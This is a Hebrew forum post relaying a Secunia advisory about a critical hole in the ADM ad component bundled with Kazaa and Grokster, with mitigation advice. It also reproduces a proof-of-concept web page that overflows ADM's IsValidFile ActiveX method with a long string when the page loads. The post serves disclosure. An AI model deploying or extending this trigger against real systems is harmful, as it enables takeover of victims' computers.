הכתבה שפורסמה בנענע:
ביום שישי, דיווחה חברת אבטחת המחשבים הדנית Secunia על פרצת אבטחה ב-ADM, תוכנה המצטרפת לתוכנות השיתוף קאזה וגרוקסטר עם התקנתן, ותפקידה הוא להפיץ תוכן פרסומי בקרב המשתמשים.
כרגע ידוע בבירור על שתי גרסאות של התוכנה הנגועות בפרצה: 4.0.0.2, המגיעה עם Grokster בגירסא 2.6 ו-4.0.0.4, המגיעה עם קאזה בגרסא Kazaa 2.7.1. לא מן הנמנע שגם גרסאות אחרות של ADM סובלות מן הבעיה.
חור האבטחה בתוכנה, אשר הוגדר ע"י Secunia כ"קריטי ביותר", מאפשר לתוקף להשתלט על מחשב בו היא מותקנת באמצעות דף אינטרנט, וכך לגרום להפעלתו של קוד זדוני. בהעדרו של טלאי אבטחה, ב-Secunia ממליצים למשתמשים להסיר את קובץ התוכנה ADM.exe או פשוט להסיר לחלוטין את תוכנת שיתוף הקבצים עצמה.
בגירסאות הפיראטיות של התוכנות (Lite), אם תהיתם, תוכנת ADM אינה מותקנת.
הקוד שפורסם בK-OTik (הצרפתי):
<HTML>
<HEAD>
This overrun occurs in \program files\Altnet\Download Manager\adm.exe
This executable is installed along with Kazaa and Grokster.
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>
function init()
{
var foo = "";
for(var icount = 0; icount < 1; icount++)
{
foo = foo +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx";
}
var ngssoftware;
ngssoftware = new ActiveXObject("ADM.ADM.1");
ngssoftware["IsValidFile"](foo);
}
//-->
</SCRIPT>
</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>
קרדיט ל: CelebrityHacker.